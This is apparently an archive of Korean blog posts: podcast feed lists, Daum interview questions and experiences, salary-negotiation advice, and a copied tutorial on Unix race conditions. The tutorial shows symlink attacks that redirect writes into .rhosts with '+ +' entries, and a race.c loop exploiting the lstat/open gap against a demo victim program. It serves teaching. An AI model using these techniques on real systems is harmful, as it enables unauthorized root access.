행복이 아부지

아이튠즈>고급>팟캐스트등록 에서 아래 주소를 등록하시면 청취 가능합니다.


등록하시면 자동으로 다운로드 되고


아이팟과 연결하시면 자동으로 동기화!!!


Podcast메뉴 가시면 들으실수 있어요^^


===========================================
음악 cast
===========================================

신동엽과 이수영의 음악공간
http://leesooyoung.netcci.net/mspace/podcast.xml

강수정의 뮤직쇼 - 김제동씨와 함께하는 5분토크
http://cast.danpod.com/kbsradiocoolfmmusicshow/rss.xml

황정민의 FM대행진 - 사랑스러운그녀
http://cast.danpod.com/lovelyfm/rss.xml

이금희의 가요산책
http://cast.danpod.com/kbsradiocoolfmgayowalk/rss.xml

이영자, 심현섭의 싱싱한 12시아카펠라 우체통 - 아카펠라 그룹 '다이아'가 여러분의 사연을 노래로 만들어 드립니다
http://cast.danpod.com/kbsradiohappyfm12/rss.xml

노래의 날개위에 왼쪽으로 가는 여자, 오른쪽으로 가는 남자
http://cast.danpod.com/kbsradio1fmwing/rss.xml

슈퍼주니어의 Kiss the radio - 매일저녁 10~12시까지를 책임지는 슈퍼주니어의 키스더 라디오
http://cast.danpod.com/superjunior/rss.xml

김태훈의 프리웨이 - 6시 퇴근길, 지친 당신을 위한 자양강장 피로회복제!
http://cast.danpod.com/freeway/rss.xml

김구라의 가요광장
http://cast.danpod.com/kbsradiocoolfmgayoplaza/rss.xml

위성DMB CH.44 유레카
http://www.eureka4u.com/tt/rss

핫트랙스 - DJ의 멘트없이 한시간동안 음악만으로 이어가는 최신 가요 전문프로그램
http://cast.danpod.com/hottracks/rss.xml

쉼표 - DJ의 멘트없이 한시간동안 음악만으로 이어가는 음악 전문프로그램
http://cast.danpod.com/rest/rss.xml

노래의 날개위에 - 성악 전문 프로그램, 다양한 장르의 선곡을 통해 청취자에게 노래에 담긴 감동과 아름다움을 선사
http://cast.danpod.com/kbsradio1fmwing/rss.xml

팝스갤러리 - DJ의 멘트없이 한시간동안 음악만으로 이어가는 팝음악 전문프로그램
http://cast.danpod.com/pops/rss.xml

CBS 이정식의 all that jazz
http://cast.danpod.com/cbs_allthatjazz/rss.xml

올라이즈밴드의 내일은 기타왕
http://cast.danpod.com/allliesband/rss.xml

보이는 라디오
http://cast.danpod.com/bora/rss.xml


===========================================
어학 cast
===========================================

이지영의 굿모닝팝스
http://cast.danpod.com/gmp/rss.xml

오석태의 파워 스피킹 - 오파스와 함께 다양한 영어 컨텐츠를 활용하여 영어 회화능력을 향상 시키는 프로그램
http://cast.danpod.com/winglish_power/rss.xml

글로벌 매거진 - 웃다가 지쳐 배우는 영어!! 유쾌하고 상쾌한 글로벌 매거진
http://cast.danpod.com/winglish_global/rss.xml

CNN - Cable News Network(미국의 뉴스 전문 케이블 방송망)
http://www.cnn.com/services/podcasting/newscast/rss.xml

ESL - English as a Second Language
http://feeds.feedburner.com/EnglishAsASecondLanguagePodcast

못말리는 중국어
http://cast.danpod.com/winglish_chinese/rss.xml

일본어뉴스
http://cast.danpod.com/japanese/rss.xml

중국어 뉴스
http://cast.danpod.com/chinese/rss.xml

베트남어 뉴스
http://cast.danpod.com/vietnamese/rss.xml

인도네시아어 뉴스
http://cast.danpod.com/indonesian/rss.xml

영어 뉴스
http://cast.danpod.com/english/rss.xml

독일어 뉴스
http://cast.danpod.com/german/rss.xml

프랑스어 뉴스
http://cast.danpod.com/french/rss.xml

러시아어 뉴스
http://cast.danpod.com/russian/rss.xml

스페인어 뉴스
http://cast.danpod.com/spanish/rss.xml

아랍어 뉴스
http://cast.danpod.com/arabic/rss.xml

===========================================
문화 프로그램
===========================================


고베 팟캐스트 스테이션 - 일본 고베시 제공의 지역관광홍보 라디오프로그램
http://kouhou.city.kobe.jp/pod/kci/ko/kci_k.xml

RTA 자유아시아방송 - 워싱턴에서 전하는 북한소식
http://streamer1.rfa.org/archive/KOR/Korean_podcast.php

박인규의 집중인터뷰
http://cast.danpod.com/interview/rss.xml

CBS 공지영의 아주 특별한 인터뷰
http://cast.danpod.com/cbs_gongjiyoung/rss.xml

김방희 지승현의 시사플러스
http://cast.danpod.com/kbs1radioplus/rss.xml

엄길청의 성공시대 - 알부자들의 성공 X파일 부자되는 비법을 알려드립니다
http://cast.danpod.com/kbsradio2radiosuccess/rss.xml

글로벌 코리안 - 해외 동포들을 위한 소식
http://cast.danpod.com/korean/rss.xml

김영하의 문화포커스 - 즐거운 문화, 재미있는 문화, 쉽고 비싸지 않은 문화
http://cast.danpod.com/culture/rss.xml

파워스포츠 - TV보다 생생하고 인터넷보다 자세하게! 스포츠꾼들이 만들어가는 파워스포츠!
http://cast.danpod.com/cbs_powersports/rss.xml

월드컵 외전
http://www.kbs.co.kr/podcast/ziller.xml

Animation
http://cast.danpod.com/budi2006_contest/rss.xml

Fiction & Documentary
http://cast.danpod.com/budi2006_opening/rss.xml

MotionGraphics
http://cast.danpod.com/budi2006_invitation/rss.xml





===========================================
종교 cast
===========================================

CBS 김동호 목사의 작은 이야기
http://cast.danpod.com/cbs_kimdongho/rss.xml

CBS 오늘을 생각하며.. - CBS표준 FM에서 방송된 한국교회의 대표적인 목사님들의 설교
http://cast.danpod.com/cbs_todaythink/rss.xml

CBS 크리스천 칼럼 - CBS 라디오설교
http://cast.danpod.com/cbs_christiancolumn/rss.xml


===========================================
개인 cast
===========================================

KMUG 팟캐스트 - http://podcast.kmug.co.kr/rssfeed.php
http://podcast.kmug.co.kr/rssfeed.php

김동욱의 카이저 캐스트
http://caizer.com/podcast.xml

세랑캐스트 - serangworld에서 보내드리는 모형과 매킨토시, 그리고 영화 이야기!
http://www.serang.co.kr/cast/feed.xml

Radiokidz@AudioLog
http://odeo.com/channel/115117/rss.xml

catorlog - 어느 블로거의 독백과 방백
http://feeds.feedburner.com/gatorlog

세상 속 꿈찾기
http://ivoryivy.podcast.co.kr/index.xml

초절세 미중년 택견꾼의 Pod Cast
http://heejoon.org/rss/podcast.xml

엑스마스싸운드팟캐스트 - 음악, 미술, 게임, 그리고 삶. *주의: 주관적인 내용이 매우짙
http://xmassound.com/blog/xmascast.xml

새콤한 이야기 달콤한 세상
http://power.dobcast.com/rss

Death Jr. - PSP rss
http://feeds.feedburner.com/psprss

CIO Live Korea Podcast - IT컬럼
http://www.idgpodcast.com/kr/podcast.kr.mp3.xml

PaperBoots.net - 정성훈의 오디오 시험방송 캐스트,
http://www.paperboots.net/podcast/podcastRSS.pcast

음... 제한된 명령어 Set을 구성해서

원하는 결과를 얻어오는 게임이네요.

컴퓨터를 전공하신 분이라면 쉽게 해결하실수 있을듯...

한번쯤 해보시면 잼나겠네요.

주의: 재귀적 호출도 생각을 해야하며, 무한 Loop를 돌아서는 안됨
        항상 Termination State를 유지해야만 게임이 Clear됨.

왜 우리나라는 이런 게임을 만들지 못하는 걸까요? 참신한데... 쩌비..



혹시 안되시는 분들은 다음 링크를 참조 바랍니다.

http://cache.armorgames.com/files/games/light-bot-2205.swf

참고하세요~

자기소개
특별히 지원한 동기 / 비전과 지원동기
기술적인 자기소개 / 기술적인 장점 / 자신의 기술 장점, 그 장점을 어떻게 이용할 것인지?
자신의 능력을 다음에서 어떻게 발휘할 것인가?
프로젝트 중 기억에 남는 프로젝트는?
자신이 가장 자신있는 프로그래밍 언어는?
다음 서비스를 사용해 본 경험 / 추가되어야 할 서비스
다음 서비스 중 사용해본 서비스와 인상깊었던 서비스는?
다음 서비스의 개선해야 할 점
다음서비스 사용 사례(좋은점/나쁜점)
블로그, 미니홈피, 플래닛에 대해서 설명하시오
다음 미니홈피에 대해서 어떻게 생각하십니까?
다음 미니홈피를 개선시킬 방법은?
다음 미니홈피가 싸이월드나 블로그에 비해 다른점은?
차세대 포탈 서비스로 다음이 나아가야 할 길은?
앞으로 네티즌을 위해서 어떤것이 추가되어야 하겠는가?
사람들이 많이 찾아오는 포탈사이트를 만들려면?
차세대 포탈사이트로 다음이 나아가야 할 중점은?
다음이 네이버와 비교하여 이야기 해보시오.
최근 오픈한 서비스, 문제점
최근 다음이 제공한 서비스는 무엇이며, 사용해본 소감은?
경쟁사를 경쟁하기 위한 방법은?
친구는 몇명?
장/단점?
동아리에서 느낀 점 / 동아리에서의 역할은?
철야, 야근에 관해서?
CEO가 된다면?
로또에 당첨된다면?
대인관계 강점/약점
다른 합격된 곳?
노조에 대한 관점
별명?ㅋㅋ
성공과 실패
취미
직장상사와의 트러블
직업관
3년, 5년, 10년 후의 자기모습
좌우명
희망 연봉은?
자사의 인재상은?
자사의 경영이념은?
자신의 비전은?
오늘 면접본 사람중에 몇등을 했다고 생각하는가?
마지막으로 하고싶은 말

1. 마이크로 세컨드



2. 알파 , 베타

꼭... 마음 졸이고 있다가...

잠깐! 아주!~~~~~~~~잠깐! 쉬기위해서

스타를 하면...

...

... 면접 보라고 저나가 온다...

헐... 벌써 두번째... 앞으로 스타만 해야겟당~ 쿄쿄

@^-^@

돈대신 마음을 주십시요

(사장이) 회사내 연봉협상 책임자에게 보낸 편지 입니다. -------------------------------------------------- 김이사님 ! 과거 제 기억을 떠올려 보면 연봉을 협상하는 자리가 참 즐거웠고 의미있었습니다.지금은 조금 제도가 바뀌었지만 말이죠. 혹시 저처럼 즐거우시려면 아래 제가 드리는 몇가지 조언을 꼭 읽고 실행해 주십시요 1. 투정부리는 아이가 얌전한 아이보다 사탕을 더 받는 문화가 되면 위험합니다. 자신에게 humble 하고 회사에 만족하는 사람이 오히려 불이익을 받으면 안됩니다. 회사의 1차 책정액이 합리적일 경우 어필하는 분들에게 문제가 있습니다. 반대로 합리적인 직원이 회사에 어필을 많이 한다면, 회사의 1차 책정액이 합리적이지 못한거니 바로 잡으십시요. 어느쪽인지 잘 판단하십시요 2 .기회비용 마인드를 가지고 그 운용 방식을 따르십시요 협상자에게 회사가 드린 권한 비용은 곧 기회비용입니다. 회사측에서 협상과정에서 원래 가치보다 100만원을 덜 주는 바람에, 해당 직원의 사기가 꺾이거나 불만이 고조되면 그건 오히려 100만원 이상을 회사가 손해보는겁니다. 회사측에서 협상과정에서 원래 가치보다 100만원을 더 주었는데도 해당직원은 당연하다고 받아들이면 회사는 그 100만원을 그냥 버리는 겁니다. 회사측에서 협상과정에서 원래 가치보다 100만원을 더 주고 해당직원이 기뻐하고 힘을 얻는다면 그건 100만원 이상을 얻는 겁니다. 그 기회비용 원칙에 어긋난 협상을 하지 마십시요 돈을 더주고 말고의 문제가 아닙니다. 협상의 과정은 싸움이어도, 한사람은 얻고 한사람은 잃었더라도, 협상의 끝은 양자 만족이어야 합니다. 3. 정확한 데이터로 임하십시요 그 데이터에 대한 동의를 얻으십시요 모든 피협상자는 자신의 잘한 일만 떠올리게 됩니다. 그에 대한 공격을 하라는 것이 아니라 회사에서도 그에 상응한 데이터를 가지고 임하시는게 합리적입니다. 반대로 피협상자도 정확한 데이터를 가지고 이야기하게 유도 하십시요 회사에 기여한 부분들은 플러스로 작용되는데 회사에 끼친 손해는 마이너스가 아니라 제로로 반영되는 건 옳지 않습니다. 4. 원가 개념을 생각하십시요 특정 협상 대상에게 회사가 1년에 세일즈를 10건 해오라고 월급 100만원을 주었다고 칩시다. 그 대상자가 지난해에 세일즈를 10건 해왔다면 그때 비로소 동결 내지, 연차 상승 내지 물가 상승분을 누릴 효과가 있는겁니다 10건을 하도록 기존 연봉을 받고 있는 협상대상자가 “나는 세일즈를 9건이나 해왔으니 올려줘야한다 “ 라고 말하면 대부분의 임원들은 원가 개념을 상실하고 맙니다. "그는 10건에 맞게 책정한 연봉을 받고 있었다 “는 생각을 정확히 할수 있어야 합니다. 반대로 12건을 해온 사람에게 그에 대한 보상을 해주어야 할 의무를 잊어서도 안됩니다. 대부분의 회사는 그 2건을 인센티브로 해결하지만 많은 분들은 9건을 해도 인센티브를 받아야 한다고 착각하고 있습니다. 그런 직원은 버리십시요 5. 상대 평가에 대한 원칙을 가지십시요 연봉 100만원을 받는 신입 직원이 회사에 150의 가치를 안겨줬고 연봉 200만원을 받는 고참 직원이 회사에 200의 가치를 안겨주면 상승해야할 사람은 연봉 100만원의 신입직원입니다만 대부분 200만원의 고참을 올려줍니다. 그런 우를 범하지 마십시요 연봉 100만원을 받는 신입 직원이 회사에 150의 가치를 안겨줬고 연봉 200만원을 받는 고참 직원이 회사에 250만원의 가치를 안겨주었다면 결과는 어떨까요 마찬가지로 신입직원이 더 우대 받아야 합니다. Out put 의 크기보다 Input에 대한 output의 비율을 고려해 보상해 주셔야 성장하는 신입들에게 합리적입니다. 6.협상의 연속성을 유지하십시요 지금 책정된 금액으로 어느정도의 가치를 회사에 환원해야하는지 명확히 한뒤 다음에 상승하려면 어떤 가치를 주길 바란다는 안내를 해주는 발전적인 협상이 되도록 하십시요 막연히 “열심히하면 올려줄께” 가 아니라 회사는 당신에게 어느정도의 out put을 기대한다는 정확한 지침을 주시고 발전 시키십시요 그것이 1년에 몇 개의 프로젝트를 해야한다는 계량적인것이어도 좋고 1년동안 컨설턴트로서의 독자해결능력을 완성하라는 식의 질적인 것이어도 좋습니다. 다음해 협상은 그 내용을 기본으로 진행하십시요 7. 무형의 가치를 인정하고 그 가치도 금전화 시켜 주십시요 돈을 잘벌어오는 직원이 그 가치를 인정받는다면 회사에 좋은 문화를 확산시키고 후배직원들의 인간적인 존중을 받는 상사나 회사의 좋은 분위기를 유지하고 호의로 일하는 신입직원들의 가치 또한 인정받아야 합니다. 단 그 가치는 어느 쪽이 더 우선이거나 중요하거나 하지는 않습니다. 또 한가지만 반영되어서도 안됩니다. 일을 잘하지만 좋지 않은 Attitude를 소유한 직원은 임금 상승사유와 하락사유를 다 가지고 있으므로 본전이어야 합니다. Attitude가 좋지 않은데도 임금이 깎이지 않은 건 일을 잘했기 때문이고 일을 잘했음에도 임금이 오르지 않은건 Attitude가 좋지 않기 때문이기 때문에 억울해 하면 안된다는 사실을 명확히 해두어야 합니다. 반대로 좋은 문화를 확산시키고 일을 못하는 직원 역시 같은 이유로 본전입니다. 그냥 감성적인 가치로 착하니 올려주고 일 잘하니 올려주고 해서는 안되고 태도 나쁘니 깎고 일 못하니 깎고 해서는 안됩니다. 어떤 부분에 어떤 가치를 가지고 있느냐를 생각해 주셔야 합니다. 단기적으로는 Attitud가 좋은 분이 일을 못한다 하더라도 이 회사에 남아있게 하고 싶지만. 장기적으로는 둘중 하나라도 부족한 사람은 이회사 가족이 될 수 없습니다. 8. 고정가치와 변동가치에 대해 인식하십시요 어떠한 직원이 엄청난 과로를 해서 좋은 결과를 냈거나, 특정한 대형 수주를 통해 기여했다면 그 가치는 변동가치입니다. 그 직원에게 일년내내 과로를 요구할수 없고 일년내내 대형 행운을 가져오라고 할 수 없습니다. 결국 그 부분은 연봉에 반영할 내용이라기 보다는 특별 상여금으로 적절히 지급 하는 것이 옳습니다. 반면에 어떤 직원이 뛰어난 잠재성을 가지고 있는데 그 능력을 미처 활용하지 못했더라도 그 능력은 고정가치 입니다. 그 가치에 대해 소홀히 책정해선 안됩니다. 예를 들어 뛰어난 미디어 네트웍을 가진 사람이 지난해 업무상 미디어관련일을 하지 않았다고 해서 그 가치가 없어지는 건 아닙니다. 또 네이티브 수준의 영어실력자가 국내 고객을 상대하느라 그 실력을 쓰지 않았더라도 그 고정가치는 사람의 몸값에 반영되어야 합니다. 누군가 자발적으로 새벽에 학원을 다니며 자신의 실력을 키우고 그 실력을 회사에 발휘해 준다면 회사는 그 노력의 몇배의 가치를 벌게 해줄 의무가 있어야 합니다. 학원비를 대주는게 회사가 할일이 아니라 스스로 투자해서 실력을 키운 사람에게 투자비 이상을 전달하는 게 회사가 할일입니다 9. 선불 개념과 후불개념에 대해 인식하십시요 “지난해 열심히 일했으니 그에 맞는 돈을 받겠습니다” “앞으로 열심히 일할 테니 그에 맞는 돈을 받겠습니다” 어느쪽이 제대로 된 협상일까요 그 두가지가 복합적이어야 합니다. 어느 한쪽의 논리로 직원이 손해봐서도 이득봐서도 안될것으로 보입니다. 앞으로의 활약에 대한 자세가 의심되는 사람에게 투자하지 마십시요 지난해 보이지 못한 모습을 돈만 주면 보일거란 착각도 하지 마십시요 물론 반대도 성립합니다. 앞으로 정말 열심히 주어진 임무를 잘할 사람에게 선불을 지급하는 모험을 하십시요 지난해 정말 열심히 일을 한 사람에게 최선의 보상을 하십시요 10. 교환가치를 믿으십시요 앞에 아주 고액연봉자의 실력자가 앉아 있습니다. 거드름을 떨고 나없으면 이 회사가 망한다고 이야기 할지도 모릅니다. 하지만 그 직원을 포기하면 다른 실력자를 뽑을 고액을 확보하게 됩니다.  어차피 회사는 한사람이 있고 없고에 흔들림 없어야 하고 유지하든 헤어지든 적절한 교환이고 거래입니다. 절대 그들앞에 을의 입장에 서지 마십시요 앞에 아주 작은 연봉의 주니어가 앉아 회사가 작은 배려를 해주기 바라고 있습니다. 회사는 거래를 떠나 몇가지 사회적 책임을 가지고 있고 사회생활을 시작하는 사람들에게 기회를 주는 것도 그 책임중 하나입니다. 그들에게 적절히 만족을 줄 금액은 그리 부담되지 않을 수 있습니다. 절대 그들앞에 갑의 입장에 서지 마십시요 11. 모든 원칙을 투명하게 지킬 수 있을때 이런 생각을 하십시요 " 내앞에 앉은 직원은 나를 위해 일하는 사람이며 나와 우리 가족을 먹여주고 도와주는 소중하고 고마운 사람들이다 " 이런 생각을 하고 있지만, 혹시라도 어려운 현실의 벽에 부딪힐때 이 말을 실천하십시요 "돈대신 마음으로라도 다 채워주라"

출처 : Tong - 이 석님의 부~자됩시다통

연봉협상의 계절…전략이 좌우한다

1. 자신의 업무실적을 계량화하라 준비없는 협상은 백전백패. 자신의 업무내용과 본인의 활약이 회사에 어떤 이익을 남겼는지 등을 정리해 수치 중심의 객관적 자료를 만들어야 한다. 2. 정보를 최대한 수집하라 연봉 관련 사이트, 헤드헌터 등의 조언을 통해 동종업계의 비슷한 경력을 가진 사라므이 연봉을 미리 알아두자. 회사쪽에 “얼마를 달라”고 말하기보다 “저와 같은 경력을 지닌 사람은 어느수준의 연봉이 적당하다고 생각하십니까”라며 의중을 떠보는 것도 하나의 기술. 협상의 실마리를 푸는 역할을 해줄 수 있다. 3. 꾸준한 자기계발은 필수다 몸값은 회사에서 인정받는 자신의 능력을 객관적으로 보여주는 지표. 따라서 업무관련 자기계발은 필수다. 외국어 능력과 업무 전문성을 키우는 것은 물론, 자신의 업적은 회사 안에서 적당히 홍보할 필요가 있다. 조직원들에게 ‘일 잘하는 사람’이라는 인식을 심어주기 때문. » 연봉협상 6가지 원칙 4. 액면가만 보지 말고 실속 따져라 회사별로 복리후생과 인센티브는 천차만별. 연봉을 300만원 올려준다고 해서 이직했는데, 이전 회사에서 지원하던 차량유지비, 휴대전화 사용료, 학원수강료 등이 없어졌다면 마이너스 이직일 가능성이 높다. 또 상여금제도, 스톡옵션, 퇴직금 여부 등을 고려하는 것은 기본이다. 5. 신입이라고 무조건 몸값을 낮추지 말라 연봉은 일종의 자신감의 표현. 터무니없는 금액을 제시해도 곤란하지만, ‘헐값’을 부르는 것은 자신감 결여로 비쳐질 수 있다. 채용 전에 반드시 연봉을 확인하는 것도 중요하다. 회사에 직접 묻기보다는 다른 직급 사원 등을 통해 간접적으로 파악하는 게 한국적 기업문화에서 현명한 처신이다. 6. 협상 때는 부정적인 화법을 피하라 부정적인 표현을 자제하는 게 모든 협상술의 원칙이다. ‘원래는’, ‘기본적으로’, ‘다소’, ‘~하는 자체는’ 등과 같은 불명확한 표현도 피하는 것이 좋다. *자료제공 잡코리아(www.jobkorea.co.kr)

머 제목이 주저리 기네요.

아... 기술 시험에 겨우겨우 합격해서 오늘 지금 면접을 보고 왔습니다.
항간에는 면접이 마지막이라는 말도 있고, 2차 면접이 있다고도 하는데... 담주에 결과가 나와야지 확실히 알겠네요.



먼저, 양재역에 버거킹 건물 3층에 있는 다음의 휴게실에서 면접을 진행합니다.
도착하면 건물의 크기는 그리 크지 않은데, 한 3층에서 부터 근 15층까지는 모두 다음이 사용하는 거 같더라구요.
아무튼, 3층에 딱 들어서면 나무가 몇그루 심어져 있습니다. --;;;
건물안에 나무라... 예전에 강남에 어떤 모임을 가질 수 있는 카페에서 본 것과 비슷하더라구요.
아무튼, 참 참신한것 같았습니다. 풍선도 달려있고, 책두 있고... 다른 면접과는 사뭇 다른 느낌이였다는.



먼저 준비된 서류를 제출하면, 10문제 가량이 적혀있는 용지를 나누어 줍니다.
그 종이에는 총 10문제가 적혀있습니다.
보아하니 문제지두 무지 많아보입니다. 제가 받은게 3A set인가? 그러더라구요.
제가 선택한 문제는 "서비스의 개인화에 대해서 설명하라" 입니다. 더 자세한것은 알려드리기 그렇네요.


총 5명이 면접에 들어가고, 면접관은 5분이 계셨습니다.
그리고, 총 1시간의 면접을 진행하며, 2개 조로 진행됩니다.
그러니... 어림잡아... 하루에 9시 부터 저녁 6시까지 진행한다고 하면,... 8시간 * 10명...
한 80명 되겠네요. 점심시간 빼고.
모르긴 해도 1주일 면접을 본다면 560명 정도 되겠네요. 헐... 많다... 근데 1주일 보는지는 잘 모르겠네요.


질문내용은 앞부분에 기술적인 질문이 많이 있습니다.
정확히 알려드릴수는 없지만, 조금은 다음커뮤니케이션의 서비스 기술들과 접목된 것들을 잘 인지하고 가시길...
아! 참고로 전 서비스 & 인프라 개발이였습니다.

그리고 , 인성은 조금 압박질문이 몇개 있습니다. 즉, 정답이 없는... 엄마가 좋아 아빠가 좋아 식의...
우문엔 현답이라고, 솔직한 답변과 자신감이 중요할 거 같더라구요.



전 첨에 자기소개할 때 너무 버벅거려서 걱정이 되긴하지만, 뒤엔 무난히 넘긴 것 같아서
함 기대를 해보고 있습니다.


많은 정보를 드릴수 없음을 이해해주세요. @^-^@
2008년도 분들이 이 글을 보시겠지만, 많은 도움되시기 바랍니다.

출처:

Study on Race Condition - Seoro Lee : 2002-01-25
http://khdp.org/2004/wiki/doc/Race_Condition

1. 머리말

 

유닉스는 멀티 유저를 지향한 매우 훌륭한 시스템이다. 여러 사람으로 하여금 정보를 공유할 수 있도록 잘 만들어져 있다. 그러면, 개인의 Privacy는 어떤 식으로 유지가 되는 것일까? 그것은 Permission, 그리고 password 등으로 가능하도록 구현해 놓았다. 그리고, 시스템 관리를 위해서 Root라는 superuser를 두어서 어떤 일이든 가능한 위치에 놓았다.

초기에 유닉스가 나타난 당시, 사용하는 유저가 그리 많지 않았고, 또한 흑심을 품은 해커도 별로 나타나지 않았으므로, 보안에 관한 관심이 별로 없었다.

그러나, 요즈음의 경우 사용자 편의를 위해 짜여진 프로그램이 거꾸로 시스템을 공격하는 무기고가 되고 있다. 일반 유저가 프로그램의 버그를 이용하여 갑자기 관리자의 권한을 지니고 권력(?)을 휘두르는 사태에 이르렀다.

해커들이 localhost에서 관리자의 권한을 잡는 방법은 여러가지가 있으나, 아직까지 크게 알려지지 않은 이 race condition을 이 문서에서 다루어 보도록 한다.

2. race condition이란?

 

race condition이란, 해킹조건을 뜻하는 말이 아니었다. race condition은 간단히 말해서, 두 프로세스간에 resource를 사용하기 위해서, 다투는 과정이다. 그 단적인 예를 여기에 하나 보인다.

------ race condition EXAMPLE 1 ----------------
void main(void)
{
        int     childpid;
        int     a, b;
        if((childpid = fork()) > 0) { /* Parent process */
                for(a = 0; a < 100; a++) printf("O");
                exit(0);
        }
        else { /* child process */                             
                for(b = 0; b < 100; b++) printf("X");
                exit(0);
        }
}
------------------------------------------------

fork()라는 함수는 동일한 작업을 하는 프로세스를 하나 더 띄우는 함수이다. fork()를 호출할 때, 그 return값은 새로 만들어진 프로세스의 번호가 되는데, 그것으로 두 프로세스를 나눌 수 있게 된다. (자세한 것은 system prog책을 참조하시오) 그러면 위에 Remark를 보인 것 처럼 원래의 프로세스는 O라는 문자를 찍게되며, 자식으로 나온 프로세스는 X를 찍는다.

물론 각각 100번을. 이때, 유닉스는 Time Sharing을 사용하므로, 프로세스 마다 시간을 각각 할당하게 되는데, 어느쪽에 시간을 더주느냐 덜주느냐가 문제가 된다.

그냥 생각하기로는 OXOXOX... 이런 식으로 나오리라 생각할 수도 있지만, 실행해보면 OOOXXOOXXXXXXOOXOXX 이런 식으로 얽혀서 주기성이 없이 나타난다. 이것이 바로 race condition이라는 것이다.

3. Symbolic Link

 

유닉스에는 Symbolic link라는 아주 좋은 개체가 존재한다. 일반적으로 어떤 파일을 접근하고자 할때, 그것의 Full-path를 찾아가는 일은 대단히 귀찮은 일이다. 물론 PATH라는 좋은 매체가 존재하기는 하나, 그것으로는 조금 불충분하다고 생각할 수 있다. symbolic link는 그냥 path name으로 연결해주는 매체로써, 예를 드는 것이 가장 쉬울 것으로 예상된다.

당신이 시스템내에서 /home/project/AI/SIM 이라는 디렉토리에서 연구를 한다고 하자. 당신의 login디렉토리는 /user/iam이라고 하자. 당신은 그쪽으로 연구를 하러 갈때 항상 cd /home/project/AI/SIM 과같은 방식으로 갈 수 밖에 없을 것이다. 그것도 매일같이 한다면 더욱 귀찮을 것이다. 이런 경우 symbolic link를 이용하면 매우 간단히 해결된다.

당신의 홈 디렉토리에서 'ln -s /usr/project/AI/SIM .link' 라고 입력하면, ".link"라는 링크 파일이 만들어 진다. 그러면 차후에 cd .link라고 입력하면 .link는 /home/project/AI/SIM으로 연결되어 있으므로, 자동으로 그쪽 디렉토리로 이동하게 된다. 매우 편리한 기능이다.

Symbolic link는 위와 같이 매우 편리하게 이용할 수 있으나, 위험성을 많이 내포하고 있다. 유닉스에 존재하는 일반적인 버그에 수시로 나타나는 것이 바로 이 Symbolic link인데, 왜 그런지 그 이유를 살펴보도록 한다.

예를 들어서, 어떤 프로그램이 hello라는 파일을 열어서, 그곳에 무언가를 써준다고 가정한다. 이때 만약 당신이 Permission이 된다면, hello라는 파일을 지우고나서, symbolic link로 'ln -s ~xxx/.rhosts hello' 라고 해두면 어떻게 되겠는가? 그 프로그램이 실행되면 hello라는 파일을 여는데, hello는 ~xxx/.rhosts라는 파일에 링크되어 있으므로, 그 프로그램은 ~xxx/.rhosts를 열어서 쓰게 된다. (물론 잘만 프로그램을 짜면 그런 일을 없앨 수 있다.)

이러한 단적인 예제가 elm 에 존재하는 autoreply라는 버그였는데, 그것은 setuid root되어 있고, /tmp에 arep.???? 라는 666 mode의 파일을 생성한다. 그러면, 그 생성되는 파일을 없애고(unlink), symbolic link를 /.rhosts(root의 .rhosts)로 연결시켜버린다. 그러면 실행하면서 /.rhosts라는 파일에 "+ +"정도가 들어가게 하기만 하면, 만사 OK(or BAD?)가 된다.

4. Why race condition APPEAR?

 

위와 같다면 왜 race condition이 등장하게 되었을까? 그냥 링크시켜서 하면 되는 것인데, 왜 프로세스 간의 resource경쟁이 나타나는가? 그것은 일종의 방어자와 공격자의 싸움에서 등장한 결과라고도 볼 수 있다.

프로그래머는 드디어 위와 같은 autoreply의 문제점을 인식하고, 새로운 방법을 모색하게 되었다. 그것은 바로 lstat()를 이용한 것으로, lstat()을 이용하여, 먼저 modify하고자 하는 파일이 Symbolic Link인지를 먼저 파악하고 그런 후에 그 파일을 open()시켜서 처리하도록 한것이다. 정말 혁신적인 방법으로, 아무런 문제가 없는 듯이 보였다. 그러나, 여기에서 race condition이 등장한다.

lstat()과 open()사이에는 분명히 갭이 존재한다. 그 갭을 적절히 이용한 것이 바로 race condition인데, 먼저 race프로그램을 background로 돌린다. race 프로그램은 돌면서, 공격하고자 하는 프로그램이 modify하는 파일을 연속해서 지우고, 링크를 만들고 하는 작업을 반복한다. 그런 후에 공격하고자 하는 프로그램을 돌린다. 그러면 어떻게 되는가?

lstat()이 이루졌을때, unlink()가 되어있고, open()될때 symbolic link가 되어 있다면, lstat()은 무용지물이 되고 만다. 그러나, 그것이 이루어 질지 안 이루어 질지는 미지수이다. 위에서 얘기한 것 처럼 프로세스는 어떻게 시간을 할당할지 전혀 알 수 없기 때문이다. 그러므로, race condition이라 불리운다.

여기까지 설명을 했으니, 여기 내가 간단히 짜놓은 예제를 보인다. 이것은 SunOS의 sendmail(/bin/mail)의 버그를 설명하는 것이다.

------- race.c --------------------------------
-------------------- race ---------------------
#include &ltsys/types.h>
#include &ltfcntl.h>
void main(void)
{
        while(1) {
                unlink("./tmp.file");
                symlink("./.rhosts", "./tmp.file");
        }
}
-----------------------------------------------

이것은 race를 위해 돌릴 프로그램이다. 공격하고자 하는 프로그램이 현재 디렉토리에 "tmp.file"이라는 이름의 파일을 변경한다고 할 때, 만들어 놓은 것이다. "tmp.file"지우고, 그후 다시 현재 디렉토리의 ".rhosts"에 링크하고하는 작업을 반복시키고 있다. 실행 파일 명은 race이다.

---- victim.c ---------------------------------
------------------------ xx -------------------
#include &ltsys/types.h>
#include &ltsys/stat.h>
#include &ltfcntl.h>
main()
{
        struct stat buf;
        char *name = "./tmp.file";
        char *data = "+ +\n";
        int     fd;
        int     is_link;
        int     i;
        if(lstat(name, &buf)) {
                printf("File does not Exist.\n");
                fd = open(name, O_WRONLY|O_CREAT, 0644);
                write(fd, data, strlen(data));
                now_ok();
                close(fd);
                exit(0);
        }
        else {
                printf("File does EXIST!\n");
                printf("Now This file is a ");
                if((is_link = S_ISLNK(buf.st_mode)) ) printf("link\n");
                if(S_ISREG(buf.st_mode) ) printf("regular file\n");
                if(is_link) {
                        printf("THIS IS SYMBOLIC LINK. DIE MAN\n");
                        exit(0);
                }
                fd = open(name, O_WRONLY | O_APPEND);
                write(fd, data, strlen(data));
                now_ok();
                close(fd);
                exit(0);
        }
}
now_ok()
{
        printf("Now ok is Appended.\n");
}
--------------------------------------------

victim.c는 공격하고자 하는 프로그램의 간단한 예제이다. 꽤 길어졌는데, 그것은 그 과정을 확실히 보이기 위함이다.

